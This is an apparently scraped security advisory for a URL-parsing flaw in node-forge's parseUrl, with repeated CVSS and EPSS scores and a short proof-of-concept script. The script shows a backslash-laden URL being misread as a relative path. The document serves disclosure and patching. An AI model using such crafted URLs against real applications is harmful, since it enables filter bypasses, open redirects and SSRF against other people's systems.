6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
28.6%
parseUrl
functionality in node-forge
mishandles certain uses of backslash such as https:/\/\/\
and interprets the URI as a relative path. Browsers accept backslashes after the protocol, and treat it as a normal slash, while node-forge sees it as a relative path and leads to URL Redirection to Untrusted Site.
Create the following PoC file:
// poc.js
var forge = require("node-forge");
var url = forge.util.parseUrl("https:/\/\/\www.github.com/foo/bar");
console.log(url);
Execute the following commands in another terminal:
npm i node-forge # Install affected module
node poc.js # Run the PoC
Check the Output:
{
full: 'https://',
scheme: 'https',
host: '',
port: 443,
path: '/www.github.com/foo/bar', <<<---- path should be "/foo/bar"
fullHost: ''
}
In the above example path
should be "/foo/bar"
or it should return it as null as per https://github.com/digitalbazaar/forge/blob/c666282c812d6dc18e97b419b152dd6ad98c802c/lib/util.js#L2266
Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
0.001 Low
EPSS
Percentile
28.6%